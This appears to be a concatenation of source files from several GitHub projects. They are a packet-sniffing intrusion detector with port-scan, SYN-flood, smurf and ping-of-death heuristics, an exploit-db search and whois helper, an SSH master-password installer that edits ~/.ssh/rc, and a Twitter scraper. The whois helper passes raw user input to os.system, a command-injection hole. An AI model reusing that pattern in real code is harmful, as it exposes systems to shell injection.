(header, p) = cap.next()
packets.append(p)
total_packets=total_packets+1
if(total_packets>=0):
#print packets[total_packets-1]
pass
#print ('%s: captured %d bytes, truncated to %d bytes' %(datetime.datetime.now(), header.getlen(), header.getcaplen()))
#parse_packet(packet)
#Convert a string of 6 characters of ethernet address into a dash separated hex string
#function to parse a packet
if __name__ == "__main__":
main()
```
#### File: 0x0mar/PyDetector/main_window.py
```python
import Tkinter
from Tkinter import *
import logs
import Tkinter
import thread
import parse_packet
import capture
import tkMessageBox
import alerts
class main_window:
def invalid(self):
tkMessageBox.showerror("", "Invalid Username or Password")
def donothing(self):
filewin = Toplevel()
button = Button(filewin, text="Do nothing button")
button.pack()
def start_capture_thread(self):
# cap = thread(target=capture.main, name="capture_thread")
thread.start_new_thread(capture.main,(self,))
thread.start_new_thread(parse_packet.main,(self,))
def start_logs_thread(self):
# log = thread(target=logs.main, name="logs_thread")
thread.start_new_thread(logs.main,(self,))
def start_alerts_thread(self):
thread.start_new_thread(alerts.main, (self,)) # pass the callable and its args separately; calling it inline blocks the GUI
def stop(self):
pass
def main(self):
#cap=capture()
#cap.main()
#cap.main()
root=Tk()
#alt = Thread(target=capture.main, args=(i,))
root.wm_title("PyDetector")
menubar = Menu(root)
adminmenu = Menu(menubar, tearoff=0)
adminmenu.add_command(label="Configuration", command=self.donothing)
#adminmenu.add_command(label="", command=donothing)
#adminmenu.add_command(label="", command=donothing)
#adminmenu.add_command(label="Save as...", command=donothing)
#adminmenu.add_command(label="Close", command=donothing)
adminmenu.add_separator()
adminmenu.add_command(label="Exit", command=root.quit)
menubar.add_cascade(label="Administration", menu=adminmenu)
viewmenu = Menu(menubar, tearoff=0)
#viewmenu.add_command(label="Undo", command=donothing)
viewmenu.add_separator()
viewmenu.add_command(label="Logs", command=self.start_logs_thread)
viewmenu.add_command(label="Alerts", command=self.start_alerts_thread)
#viewmenu.add_command(label="", command=donothing)
#viewmenu.add_command(label="P", command=donothing)
#viewmenu.add_command(label="D", command=donothing)
#viewmenu.add_command(label="S", command=donothing)
viewmenu.add_command(label="Exit", command=root.quit)
menubar.add_cascade(label="View", menu=viewmenu)
#menubar.add_cascade(label="Alerts", menu=viewmenu)
helpmenu = Menu(menubar, tearoff=0)
helpmenu.add_command(label="Help Index", command=self.donothing)
helpmenu.add_command(label="About...", command=self.donothing)
menubar.add_cascade(label="Help", menu=helpmenu)
btn_start=Tkinter.Button(root,text="Capture",width=10,fg="black",command=self.start_capture_thread)
btn_start.pack()
btn_stop=Tkinter.Button(root,text="STOP",width=10,fg="red",command=self.stop)
btn_stop.pack(pady=20,padx=20)
# btn_stop=Tkinter.Button(root,text="Login",width=10,command=stop)
#root.config(menu=menubar)
root.config(menu=menubar)
w=5000
h=3000
ws = root.winfo_screenwidth()
hs = root.winfo_screenheight()
#calculate position x, y
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
root.geometry('%dx%d+%d+%d' % (w, h, x, y))
root.mainloop()
#if __name__=='__main__':
# main_window.main()
```
#### File: 0x0mar/PyDetector/parse_packet.py
```python
import socket
from struct import *
import datetime
import pcapy
import sys
import time
from timeit import default_timer
import logs
from threading import Timer
import capture
import alerts
import ips
import db_load
import MySQLdb
global protocol
global s_addr
global d_addr
global s_mac
global d_mac
global set_block
global db
global cursor
processed_packets=0
set_block= set()
set_icmp_s_addr=set()
set_port_nos=set()
set_ping_of_death_s_addr=set()
set_smurf_s_addr=set()
set_ddos=set()
s_no_alerts=0
s_no_logs=0
start_sync_flood_timer = default_timer()
start_ddos_timer=default_timer()
duration_sync_flood=0
duration_ddos=0
nmap_s_addr=""
nmap_s_mac=""
def main(self):
print "parse main"
global processed_packets
global db,cursor
# Open database connection
db = MySQLdb.connect("localhost","root","","sid" )
# prepare a cursor object using cursor() method
cursor = db.cursor()
print "conn estd"
while(True):
# pass
if(capture.total_packets==processed_packets):
print "in sleep"
time.sleep(2)
print "parse while"
if(capture.total_packets>processed_packets):
print "capture.total packet = %d" %capture.total_packets
print "processd packet = %d" %processed_packets
#print "dddd",capture.packets[0]
#print "length of packt",len(capture.packets)
parse_packet(capture.packets[processed_packets])
#capture.packets=capture.packets[processed_packets:]
processed_packets=processed_packets+1
print "processd packets = %d"%processed_packets
def parse_packet(packet):
#print packet
#parse ethernet header
print "set_port_nos=%s" %set_port_nos
global iph_length,s_mac,d_mac,set_block,nmap_s_addr,set_smurf_s_addr
global temp, start_sync_flood_timer,start_ddos_timer,s_no_alerts,nmap_s_mac,s_no_logs
eth_length = 14
eth_header = packet[:eth_length]
eth = unpack('!6s6sH' , eth_header)
eth_protocol = socket.ntohs(eth[2])
s_mac=eth_addr(packet[6:12])
d_mac=eth_addr(packet[0:6])
print 'Destination MAC : ' + d_mac + ' Source MAC : ' + s_mac + ' Protocol : ' + str(eth_protocol)
"""
duration_sync_flood = default_timer() - start_sync_flood_timer
print "default_timer()=%s"%default_timer()
print "start_sync_flood_timer=%s"%start_sync_flood_timer
print "duration_sync_flood=%s" %duration_sync_flood
"""
#Parse IP packets, IP Protocol number = 8
if eth_protocol == 8 :
print "sadfd"
#Parse IP header
#take first 20 characters for the ip header
ip_header = packet[eth_length:20+eth_length]
#now unpack them :)
iph = unpack('!BBHHHBBH4s4s' , ip_header)
version_ihl = iph[0]
version = version_ihl >> 4
ihl = version_ihl & 0xF
iph_length = ihl * 4
print "length====",iph_length
ttl = iph[5]
global protocol
global s_addr
global d_addr, no_syn_ack_packets, no_ack_packets
global flag, no_syn_packets
protocol = iph[6]
s_addr = socket.inet_ntoa(iph[8]);
d_addr = socket.inet_ntoa(iph[9]);
print 'Version : ' + str(version) + ' IP Header Length : ' + str(ihl) + ' TTL : ' + str(ttl) + ' Protocol : ' + str(protocol) + ' Source Address : ' + str(s_addr) + ' Destination Address : ' + str(d_addr)
duration_sync_flood = default_timer() - start_sync_flood_timer
print "default_timer()=%s"%default_timer()
print "start_sync_flood_timer=%s"%start_sync_flood_timer
print "duration_sync_flood=%s" %duration_sync_flood
print "set_port_nos=%s" %set_port_nos
print "len(set_port_nos)%d"%len(set_port_nos)
if(duration_sync_flood>10):
start_sync_flood_timer=default_timer()
print "capture.no_ack_packets=%s " %capture.no_ack_packets
print "capture.no_syn_packets=%s" %capture.no_syn_packets
#print "len(set_port_nos)%d"%len(set_port_nos)
#print "len(set_port_nos)=%s"%len(set_port_nos)
if(len(set_port_nos)>100):
alerts.insert(nmap_s_addr,nmap_s_mac,"Port Scanning", "NMAP","Medium")
s_no_alerts=s_no_alerts+1
db_load.pyd_db_alert(s_no_alerts,'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),"Port Scanning","NMAP",nmap_s_addr,nmap_s_mac,"Medium")
print "nmap sourceaddre=%s"%nmap_s_addr
set_block.add((nmap_s_addr,"tcp"))
set_port_nos.clear()
print "nmap block ips",set_block
if(capture.no_ack_packets<(capture.no_syn_packets*0.75) and len(set_port_nos)==1 and capture.no_syn_packets>300 ):
alerts.insert(s_addr,s_mac,"Flooding of sync packet", "TCP Sync Flood","Medium")
s_no_alerts=s_no_alerts+1
db_load.pyd_db_alert(s_no_alerts,'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),"Flooding of sync packet","TCP Sync Flood",s_addr,s_mac,"Medium")
set_port_nos.clear()
set_block.add((s_addr,"tcp"))
# set_block.append((s_addr,source_port))
#TCP protocol
if protocol == 6 :
print "=================================TCP===================="
t = iph_length + eth_length
tcp_header = packet[t:t+20]
#now unpack them :)
tcph = unpack('!HHLLBBHHH' , tcp_header)
source_port = tcph[0]
dest_port = tcph[1]
sequence = tcph[2]
acknowledgement = tcph[3]
doff_reserved = tcph[4]
print "=========================offset===================="
print doff_reserved.__sizeof__
tcph_length = doff_reserved >> 4
print "=========================tcph[5]==============="
#print bin(tcph[5])
#print tcph[5]
print "=====================tcp_syn value=============="
"""
if(duration>=10):
start = default_timer()
if(no_syn_packets>100):
print "syn flood"
tcp_syn=tcph[5] & 2
if(tcp_syn==2):
print "sync packet detected "
no_syn_packets=no_syn_packets+1
print "no of syn pack=%d"%no_syn_packets
duration = default_timer() - start
print "duration=%d"%duration
"""
tcp_syn=tcph[5] & 2
tcp_syn_ack=tcph[5] & 18
tcp_ack=tcph[5] & 16
if(tcp_syn==2):
capture.no_syn_packets=capture.no_syn_packets+1
print "sync packet detected "
print "dest_port=%s" %dest_port
set_port_nos.add(dest_port)
nmap_s_addr=s_addr
nmap_s_mac=s_mac
print "qqqqqqqqqqqqqqqqqs_addr=%s"%s_addr
if(tcp_syn_ack==18): # compare the SYN+ACK mask; tcp_syn is only ever 0 or 2
print "sync n ack packet detected "
capture.no_syn_ack_packets=capture.no_syn_ack_packets+1
if(tcp_ack==16): # likewise, compare the ACK mask
print "ack packet detected "
capture.no_ack_packets=capture.no_ack_packets+1
print "no of syn pack=%d"%capture.no_syn_packets
#block=(s_addr,source_port)
if(dest_port==21):
if(logs.flag==99):
logs.insert("FTP",len(packet),"")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"FTP",str(len(packet)),"")
#set_block.add((s_addr,source_port))
#print "display block",set_block
if(dest_port==25 ):
if(logs.flag==99):
logs.insert("SMTP",len(packet),"")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"SMTP",str(len(packet)),"")
if(dest_port==53 ):
if(logs.flag==99):
logs.insert("DNS",len(packet),"")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"DNS",str(len(packet)),"")
if(dest_port==443 ):
if(logs.flag==99):
logs.insert("HTTPS",len(packet),"")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"HTTPS",str(len(packet)),"")
if(dest_port==22 ):
if(logs.flag==99):
logs.insert("SSH",len(packet),"")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"SSH",str(len(packet)),"")
if(dest_port==23 ):
if(logs.flag==99):
logs.insert("TELNET",len(packet),"")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"TELNET",str(len(packet)),"")
print "set block",set_block
print 'Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Sequence Number : ' + str(sequence) + ' Acknowledgement : ' + str(acknowledgement) + ' TCP header length : ' + str(tcph_length)
h_size = eth_length + iph_length + tcph_length * 4
data_size = len(packet) - h_size
#get data from the packet
data = packet[h_size:]
print 'Data : ' + data
#ICMP Packets
elif protocol == 1 :
print "==========================ICMP==========================="
#set_icmp_s_addr.add(s_addr)
#print "set_icmp_s_addr=%s"%set_icmp_s_addr
u = iph_length + eth_length
icmph_length = 4
icmp_header = packet[u:u+4]
#now unpack them :)
icmph = unpack('!BBH' , icmp_header)
icmp_type = icmph[0]
code = icmph[1]
checksum = icmph[2]
print 'Type : ' + str(icmp_type) + ' Code : ' + str(code) + ' Checksum : ' + str(checksum)
h_size = eth_length + iph_length + icmph_length
print "SIZE OF PACKET",len(packet)
data_size = len(packet) - h_size
#get data from the packet
data = packet[h_size:]
print "icmp data= %s"%data
#print "data[52]",data[52]
if icmp_type==8:
set_icmp_s_addr.add((s_addr,s_mac))
if logs.flag==99:
if icmp_type==8:
print "icmp req"
if(data.find('abcdefghijklmnopqrstuvw')!=-1 and len(packet)==74): # find() returns -1 when absent; the needle is the standard Windows ping payload
logs.insert("ICMP Request",len(packet),"Windows Ping")
s_no_logs=s_no_logs+1
#db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"ICMP Request",str(len(packet)),"Windows Ping")
db_load.pyd_db_logs("","","","","","","","","","")
elif (data.find('01234567')!=-1 and len(packet)==98):
logs.insert("ICMP Request",len(packet),"Linux Ping")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"ICMP Request",str(len(packet)),"Linux Ping")
if(icmp_type==0 ):
print "icmp rep"
if(data.find('abcdefghijklmnopqrstuvw')!=-1 and len(packet)==74):
logs.insert("ICMP Reply",len(packet),"Windows Ping")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"ICMP Reply",str(len(packet)),"Windows Ping")
elif (data.find('01234567')!=-1 and len(packet)==98):
logs.insert("ICMP Reply",len(packet),"Linux Ping")
s_no_logs=s_no_logs+1
db_load.pyd_db_logs(str(s_no_logs),'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),s_addr,s_mac,d_addr,d_mac,"ICMP Reply",str(len(packet)),"Linux Ping")
if(alerts.flag==99):
if(d_addr.find('255')!=-1):
print d_addr.find('255')
if(s_addr not in set_smurf_s_addr):
alerts.insert(s_addr,s_mac,"Smurf attack","Smurf attack","Medium")
s_no_alerts=s_no_alerts+1
db_load.pyd_db_alert(s_no_alerts,'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),"","Smurf attack",s_addr,s_mac,"Medium")
set_smurf_s_addr.add(s_addr)
for s_smurf in set_smurf_s_addr:
set_block.add((s_smurf,"icmp"))
if(len(packet)!=74 and len(packet)!=98 and icmp_type==8):
if(s_addr not in set_ping_of_death_s_addr):
alerts.insert(s_addr,s_mac,"ICMP Tampered Packet","Ping of Death","Medium")
s_no_alerts=s_no_alerts+1
db_load.pyd_db_alert(s_no_alerts,'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),"ICMP Tampered Packet","Ping of Death",s_addr,s_mac,"Medium")
set_ping_of_death_s_addr.add(s_addr)
for s_ping in set_ping_of_death_s_addr:
set_block.add((s_ping,"icmp"))
duration_ddos = default_timer() - start_ddos_timer
print "duration_ddos=%s"%duration_ddos
print "default_timer=%s"%default_timer()
if(duration_ddos>5):
start_ddos_timer=default_timer()
print "set_icmp_s_addr=%s"%set_icmp_s_addr
if(len(set_icmp_s_addr)>=4 ):
for s in set_icmp_s_addr:
alerts.insert(s[0],s[1],"Possible DDos","DDos","Severe")
s_no_alerts=s_no_alerts+1
db_load.pyd_db_alert(s_no_alerts,'%s'%(time.strftime("%d/%m/%Y")),'%s'%(time.strftime("%H:%M:%S")),"Ping from different IPs","DDos",s_addr,s_mac,"Severe")
set_block.add((s,"icmp"))
#set_icmp_s_addr.clear()
print 'Data : ' + data
#UDP packets
elif protocol == 17 :
u = iph_length + eth_length
udph_length = 8
udp_header = packet[u:u+8]
#now unpack them :)
udph = unpack('!HHHH' , udp_header)
source_port = udph[0]
dest_port = udph[1]
length = udph[2]
checksum = udph[3]
print 'Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Length : ' + str(length) + ' Checksum : ' + str(checksum)
h_size = eth_length + iph_length + udph_length
data_size = len(packet) - h_size
#get data from the packet
data = packet[h_size:]
print 'Data : ' + data
#some other IP packet like IGMP
else:
print 'Protocol other than TCP/UDP/ICMP'
print
else:
print "========================================================other than ip"
def eth_addr (a) :
b = "%.2x:%.2x:%.2x:%.2x:%.2x:%.2x" % (ord(a[0]) , ord(a[1]) , ord(a[2]), ord(a[3]), ord(a[4]) , ord(a[5]))
return b
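# Illustrative: eth_addr('\x00\x1a\x2b\x3c\x4d\x5e') -> '00:1a:2b:3c:4d:5e'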
```
#### File: 0x0mar/PyDetector/temp2.py
```python
from time import sleep
import threading
from Tkinter import *
serialdata = []
data = True
class SensorThread(threading.Thread):
def run(self):
try:
i = 0
while True:
serialdata.append("Hello %d" % i)
i += 1
sleep(1)
except KeyboardInterrupt:
exit()
class Gui(object):
def __init__(self):
self.root = Tk()
self.lbl = Label(self.root, text="")
self.updateGUI()
self.readSensor()
def run(self):
self.lbl.pack()
self.lbl.after(1000, self.updateGUI)
self.root.mainloop()
def updateGUI(self):
msg = "Data is True" if data else "Data is False"
self.lbl["text"] = msg
self.root.update()
self.lbl.after(1000, self.updateGUI)
def readSensor(self):
self.lbl["text"] = serialdata[-1]
self.root.update()
self.root.after(527, self.readSensor)
if __name__ == "__main__":
SensorThread().start()
Gui().run()
```
#### File: 0x0mar/PyDetector/tmp.py
```python
import Tkinter
from Tkinter import *
root = Tk()
status =Label(root, text="Working")
status.grid()
def update_status():
# Get the current message
current_status = status["text"]
# If the message is "Working...", start over with "Working"
if current_status.endswith("..."): current_status = "Working"
# If not, then just add a "." on the end
else: current_status += "."
# Update the message
status["text"] = current_status
# After 1 second, update the status
root.after(1000, update_status)
# Launch the status message after 1 millisecond (when the window is loaded)
root.after(1, update_status)
root.mainloop()
``` |
{
"source": "0x0mar/Scavenger",
"score": 3
} |
#### File: 0x0mar/Scavenger/ExploitDB.py
```python
from shodan import WebAPI #shodan API requirements
from bs4 import BeautifulSoup as BS
import whois
import sys
import urllib
import os
class ExploitDB:
#Function table
#Purpose: this is used in the srchExploitDB function to parse out the links and the exploit name
@staticmethod
def table(x):
if x:
return x.startswith("list_explot_description") and not "class2 " in x #class2 was stolen from an example, we need a string argument there, may be replaced in future for something more relavent.
else:
return False
#Function srchExploitDB
#Purpose: Search and display the first ten pages of exploits for user defined search terms.
@staticmethod
def srchExploitDB(srchTerm):
num = 1 # used as counter for first printing 10 pages
#TODO: Better parsing of strings.
for num in range (1,10,1): # Printing first ten pages from exploit-db
response = urllib.urlopen('http://www.exploit-db.com/search/?action=search&filter_page=' +str(num) +'&filter_description='+ srchTerm +'&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=')
soup = BS(response)
rows = soup.findAll('td', {'class': ExploitDB.table}) # reference the filter through the class; a bare `table` is not in scope here
for row in rows:
print row
num += 1
#Function whoisSrch
#Purpose: performing who is searches
@staticmethod
def whoisSrch():
site = raw_input('Enter IP or URL: ')
result = os.system('whois '+ site) #The native whois search provides more data than any python modules I have found
print result
``` |
{
"source": "0x0ptim0us/sshmp",
"score": 3
} |
#### File: 0x0ptim0us/sshmp/sshmp_mgr.py
```python
import shutil
import hashlib
import sys
import os
import getpass
import readline
import sqlite3
import optparse
readline.parse_and_bind("tab: complete")
__version__ = "0.1 BETA"
__author__ = "<NAME>"
__contact__ = "<EMAIL>"
if sys.version_info[0] < 3:
print("Must be using Python 3.x")
sys.exit()
def print_with_check(msg):
"""print success messages"""
print(f"✓ {msg}")
def print_with_error(msg):
"""print fail messages"""
print(f"✗ {msg}")
def print_with_info(msg):
"""print informations"""
print(f"☛ {msg}")
def print_header():
header = r"""
__________ __ ____ _______
/ ___/ ___// / / / |/ / __ \
\__ \\__ \/ /_/ / /|_/ / /_/ /
___/ /__/ / __ / / / / ____/
/____/____/_/ /_/_/ /_/_/
SSH Master Password
"""
print(header)
def auth(dbs):
"""
Authorizing users for removing SSHMP or changing password
:param db:
:return:
"""
password = getpass.getpass("Enter master password: ")
password = password.strip("\n")
username = getpass.getuser()
try:
db = sqlite3.connect(dbs)
except:
print("[!] Database not found! exiting ...")
sys.exit(0)
cursor = db.cursor()
cursor.execute("""SELECT password FROM users WHERE username = ?""", (username,))
real_password = cursor.fetchone()
hashed_password = hashlib.sha256(password.encode())
if hashed_password.hexdigest() == real_password[0]:
db.close()
return True
else:
db.close()
return False
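# Note (illustrative, not part of the original file): passwords are matched as
# SHA-256 hex digests, e.g.
# hashlib.sha256("secret".encode()).hexdigest()
# == "2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b"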
class CheckSystemDependencies(object):
def __init__(self):
"""
check system information and dependencies for installing sshmp
suck as :
python executable path location
logged user home directory
old version of sshmp if exists
generate rc,database,sshmp files and directories
"""
self.python_executable_path = sys.executable
self.current_user = getpass.getuser()
self.current_user_home = os.path.expanduser(f"~{self.current_user}")
self.current_pwd = <PASSWORD>()
self.old_version_exist = self.check_old_versions()
self.app_dir = os.path.join(self.current_user_home, ".sshmp")
self.db_loc = os.path.join(self.app_dir, "passwd.db")
self.ssh_directory = os.path.join(self.current_user_home, ".ssh")
self.rc_file = os.path.join(self.ssh_directory, "rc")
def good_to_go(self):
"""
Init installer
:return:
"""
# call header
print_header()
# everything is ok, call installer
self.print_system_checks()
if self.old_version_exist == "False":
res = input("☛ Process? <y/n>")
if res.strip("\n") == "y":
InstallSSHMP()
else:
print("Bye!")
else:
print_with_info("Some version of SSHMP already installed!")
print_with_info("Use --uninstall switch for uninstall existing version!")
sys.exit()
def print_system_checks(self):
"""
print information about installation process
:return:
"""
print_with_check(f"Installing SSHMP for {self.current_user}")
print_with_check(f"User home directory: {self.current_user_home}")
print_with_check(f"Python executable path: {self.python_executable_path}")
print_with_check(f"Old version exists: {self.old_version_exist}")
print_with_check(f"SSHMP installation directory: {self.app_dir}")
print_with_check(f"SSHMP database location: {self.db_loc}")
def check_old_versions(self):
"""
check old version of sshmp
:return:
"""
ssh_rc = os.path.join(self.current_user_home, ".ssh/rc")
try:
rc_file = open(ssh_rc, "r").read()
except FileNotFoundError:
return "False"
else:
# there is old version
if "sshmp.py" in rc_file:
return "True"
else:
return "False"
class InstallSSHMP(CheckSystemDependencies):
def __init__(self):
"""
start installation process
"""
super().__init__()
self.db = ""
password1 = getpass.getpass("-> Enter master password: ")
password2 = getpass.getpass("-> Confirm password: ")
# compare 2 password inserted by user
if password1.strip("\n") == password2.strip("\n"):
self.clean_confirmed_password = password1.strip("\n")
# generate SHA256 hash from password
hashed_password = hashlib.sha256(self.clean_confirmed_password.encode())
hashed_password_hexdigest = hashed_password.hexdigest()
# create directory
self.create_directory_for_installation(app_dir=self.app_dir, ssh_directory=self.ssh_directory)
# create database for user
self.create_database(ssh_directory=self.ssh_directory, app_dir=self.app_dir, db_loc=self.db_loc)
# add username and password to database
self.insert_into_database(username=self.current_user, hashed_password=<PASSWORD>_password_hexdigest)
# create rc file
self.create_rc_file(app_dir=self.app_dir, rc=self.rc_file)
print_with_check(f"SSH Master Password successfully enabled for {self.current_user}")
print_with_check("Please reload/restart sshd service for taking effects")
# if the passwords didn't match
else:
# call the installer again so the user can retry
print_with_error("Passwords did not match, try again!")
InstallSSHMP()
def create_directory_for_installation(self, app_dir, ssh_directory):
"""
create directory for SSHMP
:return:
"""
try:
# create .sshmp directory in user home folder
os.mkdir(app_dir)
except FileExistsError:
print_with_error("SSHMP Folder is exist!")
try:
os.mkdir(ssh_directory)
except FileExistsError:
print_with_error(".ssh Folder is exist!")
def create_database(self, ssh_directory, app_dir, db_loc):
"""Create database"""
try:
# connect to Sqlite database
self.db = sqlite3.connect(db_loc)
except Exception as e:
print_with_error(f"Error: {e}")
sys.exit()
self.cursor = self.db.cursor()
try:
# create `users` table if not exists
self.cursor.execute('''CREATE TABLE IF NOT EXISTS users(id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)''')
except Exception as e:
print_with_info(f"WARNING: Database is exists!")
# check if database file exist
if os.path.exists(db_loc):
print_with_check("Database created successfully.")
def insert_into_database(self, username, hashed_password):
"""
insert into database
:return:
"""
try:
self.cursor.execute('''INSERT INTO users(username, password) VALUES(?,?)''', (username, hashed_password))
except:
print_with_info("☛ WARNING: User already exists!")
sys.exit()
finally:
self.db.commit()
def create_rc_file(self, app_dir, rc):
"""
create rc file
:return:
"""
# copy sshmp.py to the location
copy_location = os.path.join(app_dir, 'sshmp.py')
copy_manager = os.path.join(app_dir, 'sshmp_mgr.py')
shutil.copy("sshmp.py", copy_location)
shutil.copy("sshmp_mgr.py", copy_manager)
try:
os.symlink(copy_manager, "/usr/local/bin/sshmpmgr")
print_with_check("Symlink created successfully. run sshmpmgr --help for more info.")
except:
print_with_error("Creating symlink failed!")
print_with_check("SSHMP files copied.")
# add execute command in rc file
try:
rc_file = open(rc, "w")
except Exception as e:
print(e)
print_with_error("Couldn't create rc file, exiting...")
sys.exit()
else:
sshmp_file = os.path.join(app_dir, "sshmp.py")
command = f"{self.python_executable_path} {sshmp_file}"
rc_file.write(f"{command}\n")
rc_file.close()
print_with_check("The rc file created successfully.")
class UninstallSSHMP(CheckSystemDependencies):
def __init__(self):
"""Uninstall process"""
super().__init__()
def uninstall(self):
# file path of database and sshmp.py
app_file = os.path.join(self.app_dir, "sshmp.py")
app_database = os.path.join(self.app_dir, "passwd.db")
# if authorize
if auth(app_database):
# remove command from rc file
if os.path.exists(self.rc_file):
try:
rc = open(self.rc_file, "r+")
lines = rc.readlines()
rc.seek(0)
for line in lines:
if "sshmp.py" not in line:
rc.write(line)
rc.truncate()
except FileNotFoundError:
print_with_error("The rc file not found!")
sys.exit()
# remove sshmp.py if exist
if os.path.exists(app_file):
os.remove(app_file)
# remove passwd.db file if exists
if os.path.exists(app_database):
os.remove(app_database)
# remove symlink
if os.path.exists("/usr/local/bin/sshmpmgr"):
os.remove("/usr/local/bin/sshmpmgr")
print_with_check("SSHMP removed successfully!")
print_with_info("Please reload/restart sshd service for taking effects")
else:
# if user not authorized then exit
print_with_error("Operation not permitted!")
sys.exit()
class Configuration(CheckSystemDependencies):
def __init__(self):
super().__init__()
if auth(self.db_loc):
res = input(f"☛ Do you want to change password for [{self.current_user}]? <y/n>: ")
if res.strip("\n") == "y":
self.change_password()
else:
sys.exit()
def change_password(self):
"""
Change password for current user
:return:
"""
password1 = getpass.getpass("-> New password: ")
password2 = getpass.getpass("-> Confirm password: ")
# compare 2 password inserted by user
if password1.strip("\n") == password2.strip("\n"):
self.clean_confirmed_password = password1.strip("\n")
# generate SHA256 hash from password
hashed_password = hashlib.sha256(self.clean_confirmed_password.encode())
hashed_password_hexdigest = hashed_password.hexdigest()
# update password
try:
db = sqlite3.connect(self.db_loc)
cursor = db.cursor()
cursor.execute('''UPDATE users SET password = ? WHERE username = ?''',(hashed_password_hexdigest, self.current_user))
db.commit()
print_with_check(f"Password updated for {self.current_user}")
except Exception as e:
print_with_error(f"Something wrong! : {e}")
sys.exit()
if __name__ == "__main__":
"""Controll switchs"""
parser = optparse.OptionParser()
parser.add_option("-i", "--install", action="store_const", const="install", dest="element", help="Install SSHMP for current user")
parser.add_option("-u", "--uninstall", action="store_const", const="uninstall", dest="element", help="Remove SSHMP if exists")
parser.add_option("-m" ,"--manage", action="store_const", const="manage", dest="element", help="Change password and settings")
options, args = parser.parse_args()
if options.element == "install":
CheckSystemDependencies().good_to_go()
elif options.element == "uninstall":
UninstallSSHMP().uninstall()
elif options.element == "manage":
Configuration()
else:
print_with_error("Use with --help for more info.")
sys.exit()
``` |
{
"source": "0x0ptim0us/twpy",
"score": 2
} |
#### File: twpy/core/grabber.py
```python
import time
from datetime import datetime
from ..exceptions import QueryError, ParameterRequired
from .request import RequestHandler
from ..config.config import BASE_URL, MOBILE_URL, TIMELINE_WITH_TOKEN_QUERY, APIV1_URL
from ..utils import extract_cursor, extract_ff, extract_timeline_cursor, extract_timeline, extract_profile
from time import sleep
def follower_following(
username: str, limit: int = 0,
type_: str = "followers",
proxy: str = None,
interval: int = 0) -> list:
"""
Followers/Followings scraper
:param username:
:param limit:
:param type_:
:param proxy:
:param interval:
:return:
"""
result: list = []
cursor: str = str()
first_request: bool = True
has_more: bool = True
# mode = FF -> followers/followings user-agent
req = RequestHandler(user_agent="FF")
# if proxy enabled set it
if proxy:
req.proxy = proxy
while has_more:
if first_request:
url = MOBILE_URL + f"/{username}/{type_}/?lang=en"
res = req.get(url)
first_request = False
else:
url = MOBILE_URL + f"/{username}/{type_}/?lang=en&cursor={cursor}"
res = req.get(url)
if res:
# extract cursor
cursor = extract_cursor(res)
if cursor:
has_more = True
else:
has_more = False
# parse followers/followings
extracted_ff = extract_ff(res)
result.extend(extracted_ff)
# if there was limit
if limit > 0:
if len(result) > limit:
return result[:limit]
else:
sleep(interval)
continue
else:
return result
# interval
sleep(interval)
return result
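# Illustrative usage (the handle is made up):
# followers = follower_following("jack", limit=100, type_="followers", interval=1)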
def timeline(username: str, limit: int = 0, proxy: str = None, interval: int = 0) -> list:
"""
timeline scraper
:param username:
:param limit:
:param proxy:
:param interval:
:return:
"""
result: list = []
cursor = "-1"
has_more = True
req = RequestHandler(user_agent="TIMELINE", ret="json")
if proxy:
req.proxy = proxy
while has_more:
url = BASE_URL+TIMELINE_WITH_TOKEN_QUERY+f"+from:{username}"
url = url.replace("%TOKEN%", cursor)
res = req.get(url)
if res:
cursor, has_more = extract_timeline_cursor(response=res)
extracted_tweets = extract_timeline(res['items_html'])
result.extend(extracted_tweets)
# check limitation
if limit > 0:
if len(result) > limit:
return result[:limit]
else:
sleep(interval)
continue
else:
return result
sleep(interval)
return result
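# Illustrative usage: tweets = timeline("jack", limit=20)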
def profile(username: str, proxy: str):
"""
get user profile
"""
req = RequestHandler(user_agent="MOBILE")
if proxy:
req.proxy = proxy
url = BASE_URL+username+"/?lang=en"
res = req.get(url=url)
if res:
return extract_profile(res)
else:
return None
